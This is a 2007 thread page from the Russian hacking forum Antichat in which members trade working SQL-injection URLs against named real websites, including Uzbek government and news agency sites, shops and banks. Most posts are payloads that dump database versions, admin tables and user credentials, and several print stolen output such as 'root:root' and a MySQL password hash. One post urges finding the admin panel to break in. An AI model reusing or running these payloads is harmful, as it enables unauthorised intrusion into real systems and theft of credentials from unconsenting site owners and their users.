ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2651  
Старый 07.07.2007, 15:45
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Испанский хек портал:
www.elhacker.org

Код:
http://www.elhacker.org/index.php?Ver=Articulo&Id=-339+union+select+1,2,version(),user(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Таблы не подобрал, похоже на испанском =\
 
Ответить с цитированием

  #2652  
Старый 07.07.2007, 23:28
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

1. www.bustur.ru
Код:
http://www.bustur.ru/t.php?id=-1+union+select+concat_ws(0x203a20,version(),user(),database())/*
2. www.top-manager.ru
Код:
http://www.top-manager.ru/?a=1&id=116+union+select+version(),user(),3,4,database(),6,7,8/*
3. www.iwdp.co.uk
Код:
http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,user(),version(),database(),5,6,7,8,9,10,11/*
4. www.dog.ru
Код:
http://www.dog.ru/index.php3?mode=5&id=-1+union+select+1,id,3,4,5,6,7,8,9,10,11,12,name,email+from+users/*
5. www.meteoprog.com.ua
Код:
http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+concat_ws(0x203a20,version(),user(),database())/*
 
Ответить с цитированием

  #2653  
Старый 07.07.2007, 23:48
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию

Цитата:
Сообщение от The_HuliGun  
2. www.top-manager.ru
Код:
http://www.top-manager.ru/?a=1&id=116+union+select+version(),user(),3,4,database(),6,7,8/*
помойму так лудше=)
Таблица админа:
Код:
http://www.top-manager.ru/?a=1&id=116+union+select+username,2,3,4,passwd,6,7,8+from+adm+limit+0,1/*
Таблица юзеров:
Код:
http://www.top-manager.ru/?a=1&id=116+union+select+login,2,3,4,passwd,6,7,8+from+users+limit+0,1/*
P.S. Пасс админа в открытом виде так что можешь искать админку,и ломать

Последний раз редактировалось Extremal; 07.07.2007 в 23:59..
 
Ответить с цитированием

  #2654  
Старый 08.07.2007, 02:18
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от The_HuliGun  
Код:
http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+concat_ws(0x203a20,version(),user(),database())/*
Вот еще моя старая
Код:
http://meteoprog.com.ua/gorodMira.php?cityid=-1+union+select+1/*
 
Ответить с цитированием

  #2655  
Старый 08.07.2007, 05:17
Аватар для tbody
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

Вот еще парочка

http://www.ozarkfolkcenter.com/country-store/shop.asp?cat=17&type=Fruit+Chunky'+union+select+@@ version,2--

http://www.gridrecordings.com/shop.asp?id=1+or+1=(select+top+1+table_name+from+i nformation_schema.tables+where+table_name+not+in(' Formats','Images','DataTypes','forum_posts','Sampl es','News','Artists','Admin','Discography','Tracks ','Newsletter','forum_users','OrderDetails','Order s','Countries','Customers','Shipping','Products',' FormatVariations','ShippingCosts','forum_forums',' ShippingZones','Newsletters','GalleryFiles','newsl etter_content','Audio','Links','Mailinglist','View _orders','Homepage','Artist_Extras','Artist_Charts ','sysdiagrams','GalleryCat','Releases','Gallery', 'Banners','mailing_poster','mailing_view','comd_li st','forum_topics','Labels'))--

http://willow.thrilljockey.com/artists/index.html?id=10001+and+1=0+union+select+1,@@versi on,3,4--

http://www.thamesvalley.co.uk/content/index.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.tables+WHERE+TABLE_NAME+NOT+IN+ ('cartV2','c2h_ContentPublish','CustomCharge','vwL ateFIGrpPostCur','surfaceview_OrderDetails','mayfa irtoys_Links','retailteam_SupplierProductLink','Da teWatch'))--

http://www.biztrav.co.nz/Shop.asp?id=85+or+1=(select+top+1+table_name+from+ information_schema.tables)--
 
Ответить с цитированием

  #2656  
Старый 08.07.2007, 05:20
Аватар для tbody
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

Еще одна!

http://www.orangescarf.com/shop.asp?cat=137+or+1=@@version--
 
Ответить с цитированием

  #2657  
Старый 08.07.2007, 12:04
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

PR = 4

Государственная инспекция связи

Код:
http:// www . gis.uz/index.php?part=news&lang=rus&snum=-40'+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x7a),0x7a),6+from+mysql.user/*
root:root

PR = 6
Национальное информационное агентство
Код:
http: / / www .uza.uz/documents/?id1=-22709+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x7a),0x7a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
4.1.15-Debian_0.dotdeb.4-log:uza@localhost:uza

Последний раз редактировалось geezer.code; 08.07.2007 в 12:12..
 
Ответить с цитированием

  #2658  
Старый 08.07.2007, 13:49
Аватар для V1p-eR
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

Цитата:
Сообщение от Spyder  
Только вот не получается ничего оттуда вывести
Цитата:
http://www.deng-yun.com/new.php?tid=-1+union+select+convert(version()+using+latin1)+fro m+mysql.user/*
вот так выводится =)
Код:
http://www.deng-yun.com/new.php?tid=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a)+from+mysql.user/*
root@localhost:menglida:4.1.18-max
Код:
http://www.deng-yun.com/new.php?tid=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x7a),0x7a)+from+mysql.user+limit+0,1/*
root:*E60C5A74517ADD5F3CFACA0E8270CC8592A1218C

Последний раз редактировалось V1p-eR; 08.07.2007 в 13:52..
 
Ответить с цитированием

  #2659  
Старый 08.07.2007, 16:27
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.zoosbank.mn/info_view.php?id=490%20union%20select%201,name,3,password,5,6,7,8,9,10%20from%20admin%20limit+0,1/*
гмм... интересно, а есть на этот язык словарь?
 
Ответить с цитированием

  #2660  
Старый 08.07.2007, 17:30
Аватар для genom--
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

http://lorientaliste.free.fr/annu.php?origine=-1+UNION+SELECT+1,2,3,4,5,char(241,234,243,235,255, 32,229,225,224,242,252,32,229,229,32,226,32,240,23 8,242),7,8/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ